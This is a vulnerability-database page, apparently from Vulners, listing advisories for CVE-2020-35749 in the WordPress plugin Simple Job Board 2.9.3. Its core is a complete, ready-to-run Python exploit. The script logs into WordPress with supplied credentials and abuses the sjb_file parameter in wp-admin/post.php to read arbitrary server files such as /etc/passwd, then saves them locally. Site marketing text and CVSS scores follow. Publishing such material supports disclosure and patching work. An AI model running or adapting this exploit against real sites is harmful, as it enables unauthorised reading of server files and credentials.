Vulners
Lucene search
Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Wordpress Simple Job Board 2.9.3 Plugin - Local File Inclusion Exploit | 8 Feb 202200:00 | – | zdt |
 | CVE-2020-35749 | 21 Jan 202100:00 | – | circl |
 | Wordpress Simple Board Job Plugin 路径遍历漏洞 | 15 Jan 202100:00 | – | cnnvd |
 | WordPress Simple Board Job plugin path traversal vulnerability | 18 Jan 202100:00 | – | cnvd |
 | CVE-2020-35749 | 15 Jan 202116:51 | – | cve |
 | CVE-2020-35749 | 15 Jan 202116:51 | – | cvelist |
 | Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit) | 21 Jan 202100:00 | – | exploitdb |
 | WordPress Simple Job Board <2.9.4 - Local File Inclusion | 7 Jun 202603:02 | – | nuclei |
 | CVE-2020-35749 | 15 Jan 202117:15 | – | nvd |
 | CVE-2020-35749 | 15 Jan 202117:15 | – | osv |
10
# Exploit Title: Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion
# Date: 2022-02-06
# Exploit Author: Ven3xy
# Vendor Homepage: https://wordpress.org/plugins/simple-job-board/
# Software Link: https://downloads.wordpress.org/plugin/simple-job-board.2.9.3.zip
# Version: 2.9.3
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2020-35749
import requests
import sys
import time
class color:
HEADER = '\033[95m'
IMPORTANT = '\33[35m'
NOTICE = '\033[33m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
RED = '\033[91m'
END = '\033[0m'
UNDERLINE = '\033[4m'
LOGGING = '\33[34m'
color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]
def banner():
run = color_random[6]+'''\nY88b / 888~~ 888 ,e, d8
Y88b / 888-~88e 888___ Y88b / 888-~88e 888 e88~-_ " _d88__
Y88b e / 888 888b ____ 888 Y88b/ 888 888b 888 d888 i 888 888
Y88bd8b/ 888 8888 888 Y88b 888 8888 888 8888 | 888 888
Y88Y8Y 888 888P 888 /Y88b 888 888P 888 Y888 ' 888 888
Y Y 888-_88" 888___ / Y88b 888-_88" 888 "88_-~ 888 "88_/
888 888 \n'''
run2 = color_random[2]+'''\t\t\t(CVE-2020-35749)\n'''
run3 = color_random[4]+'''\t{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
print(run+run2+run3)
if (len(sys.argv) != 5):
banner()
print("[!] Usage : ./wp-exploit.py <target_url> <file_path> <USER> <PASS>")
print("[~] Example : ./wp-exploit.py http://target.com:8080/wordpress/ /etc/passwd admin admin")
exit()
else:
banner()
fetch_path = sys.argv[2]
print (color_random[5]+"[+] Trying to fetch the contents from "+fetch_path)
time.sleep(3)
target_url = sys.argv[1]
usernamex = sys.argv[3]
passwordx = sys.argv[4]
print("\n")
login = target_url+"wp-login.php"
wp_path = target_url+'wp-admin/post.php?post=application_id&action=edit&sjb_file='+fetch_path
username = usernamex
password = passwordx
with requests.Session() as s:
headers = { 'Cookie':'wordpress_test_cookie=WP Cookie check',
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15' }
post_data={ 'log':username, 'pwd':password,
'wp-submit':'Log In','redirect_to':wp_path,
'testcookie':'1'
}
s.post(login, headers=headers, data=post_data)
resp = s.get(wp_path)
out_file = open("output.txt", "w")
print(resp.text, file=out_file)
out_file.close()
print(color_random[4]+resp.text)
out = color_random[5]+"\n[+] Output Saved as: output.txt\n"
print(out)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Feb 2022 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 24
CVSS 3.17.7
EPSS0.77927